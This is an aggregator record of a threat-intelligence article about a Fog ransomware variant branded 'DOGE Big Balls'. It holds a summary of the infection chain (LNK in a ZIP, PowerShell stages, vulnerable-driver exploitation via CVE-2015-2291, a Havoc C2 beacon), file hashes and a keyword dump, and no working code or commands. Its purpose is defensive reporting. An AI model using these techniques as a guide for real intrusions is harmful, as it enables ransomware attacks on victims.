One Article Review
| Source |  Cyble |
|---|---|
| Identifiant | 8662673 |
| Date de publication | 2025-04-14 12:58:44 (vue: 2025-04-14 13:07:04) |
| Titre | Ransomware des «grosses balles» et la fausse connexion à Edward Coristine DOGE “Big Balls” Ransomware and the False Connection to Edward Coristine |
| Texte | 
Key Takeaways
This attack leverages a ZIP file with a deceptive LNK shortcut to silently execute a multi-stage PowerShell-based infection chain, ensuring stealthy deployment.
A vulnerable driver (CVE-2015-2291) is exploited through a Bring Your Own Vulnerable Driver (BYOVD) technique to gain kernel-level read/write access for privilege escalation.
The payload is a customized version of Fog ransomware, branded as "DOGE BIG BALLS Ransomware," reflecting an attempt to add psychological manipulation and misattribution.
Ransomware scripts include provocative political commentary and the use of a real individual\'s name and address, indicating intent to confuse, intimidate, or mislead victims.
The malware uses router MAC addresses (BSSIDs) and queries the Wigle.net API to determine the victim\'s physical location-offering more accurate geolocation than IP-based methods.
Extensive system and network information, including hardware IDs, firewall states, network configuration, and running processes, is collected via PowerShell, aiding attacker profiling.
Embedded within the toolkit is a Havoc C2 beacon, hinting at the threat actor\'s (TA\'s) potential to maintain long-term access or conduct additional post-encryption activities.
Overview:
A recent ransomware operation has revealed a blend of technical sophistication and psychological manipulation, setting it apart from conventional attacks. Disguised under a finance-themed ZIP file, the campaign employs deceptive shortcut files and multi-stage PowerShell scripts to deliver custom payloads, including a kernel-mode exploit tool and reconnaissance modules. This layered approach allows attackers to gat |
| Notes | ★★★ |
| Envoyé | Oui |
| Condensat | /all /fo /query /quiet” /svc 001 005 1024x512 15 2015 20adjustment 2291 2291” 256 2c38a56beec1f7c8b919a1a2d9f9497358e763a1c8d9d71aa8a0e4ef062d3ec2 300x150 30a6688899c22a3ce4c1b977fae762e3f7342d776e1aa2c90835e785d42f60c1 330e415ed1dd462486bd99676ef03bcc1da05c17ced655f82b2fbd0787e7dc8f 3d2cbef9be0c48c61a18f0e1dc78501ddabfd7a7663b21c4fcc9c39d48708e91 4104 4106345cd7a879597c5132b307f9c616e539616241d39a32393a1a8cd0c23452 44b7eebf7a26d466f9c7ad4ddb058503f7066aded180ab6d5162197c47780293 4ad9216a0a6ac84a7b0b5593b0fc97e27de9cdfeb84ab7e5339ae5a4102100c0 5402c5dc6656697b22a20e90f6ab7a2cd216ce7c70126ed0e855682035c299be 721373 805b2f5cab2a4ba6088e6b6f91d6f1f0671c61092b571358969d69ff8c184c30 8d843c757aea85087a95794f93071bfacb7c4db06f33520308f39b97cf88cabb 8e209e4f7f10ca6def27eabf31ecc0dbb809643feaecb8e52c2f194daa0511aa a59c40e7470b7003e8adfee37c77606663e78d7e3f2ebb8d60910af19924d8df abuse ac6533a2702a16e90746ce9f84895e8d579314c0e18589610e4e281d5571a954 access accomplishments accordingly accounts accurate acrobat across active activities activity actor acts adapt adapters add additional additionally address addresses adjustment admin administrative adobe advanced affected after against aid aiding aiming alias all allowing allows along also alternate among analysis analysis: analytics ano anomalies anti apart api app app/cwiper app/ktool app/lootsubmit app/pay app/stage1 appdata appears application applocker approach archive are around arp artifacts as: assigning assimilated assist associate associated att&ck® attachments attack attacker attackers attacks attempt attempts attention automated autostart available avoid balls balls” based basic beacon before begins behavior being below big binary bios blend block bolster boot both box branded branding bring bssid bssids built bundles but byovd c2: calls campaign can capabilities caption= chain chains charged chat checking checks cia cloud code collect collected collecting collection collects college com/resources/blog/lost com/wp command commands commentary common communication compared completing component compromise computer conclusion conduct config configuration configured confirmation confuse confusion connected connection connections connectivity conspiracy consuming containing content content/uploads/2025/04/new contents continuously control conventional copied copies copy core coristine could count country cpu create created creates credentials cril critical current currently custom customized cve cwiper cyber cybersecurity cyble cybleblogs d802bdaad6713549b5098d3545e07794900869c01a68024a1282fea74d40c4a3 d9182e data dbglog deceptive defector defending defense defenses delete deletes deliberate deliver delivered demands demon demonstrates department deploy deploying deployment depth deranged description designed detailed details detect detected detecting detection determine device didn direct directly directories directory directs disable disabled discovery discovery: disguised disk displays distract dll dll” dns doge dollar domain download downloaded downloaded from downloading downloads draw driver driverquery drivers drops during dynamic ecfed78315f942fe0e6762acd73ef7f30c34620615ef5e71f899e1d069dabd9e edr edward efficiency elevation elon emails embedded embeds emerging emotionally emphasis employs enable enables encoded encrypted encrypting encryption encrypts endpoint endpoints engineer enhancing ensures ensuring entries entry” env environment environments equipped escalate escalated escalating escalation especially establish etw evade evading evasion evasive even event every exe executables execute executed executes executing execution execution: exe” exfiltrate exfiltration existent expand exploit exploitation exploited exploiting exposed expression extension extensions extensive external extracting f08b5316f6bc009d0cb41d4ce0086e615bf130b667cb2cdceecad07fda24fc49 fails false felt ffe6f62b8e76fb8be1498e403941406a0f6a4dea8816878c27c031c78ca44045 figure file file= fileless filename files finance firewall five flag flaw flocked flocked” flow fog folder |
| Tags | Ransomware Spam Malware Tool Threat Cloud Technical |
| Stories | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.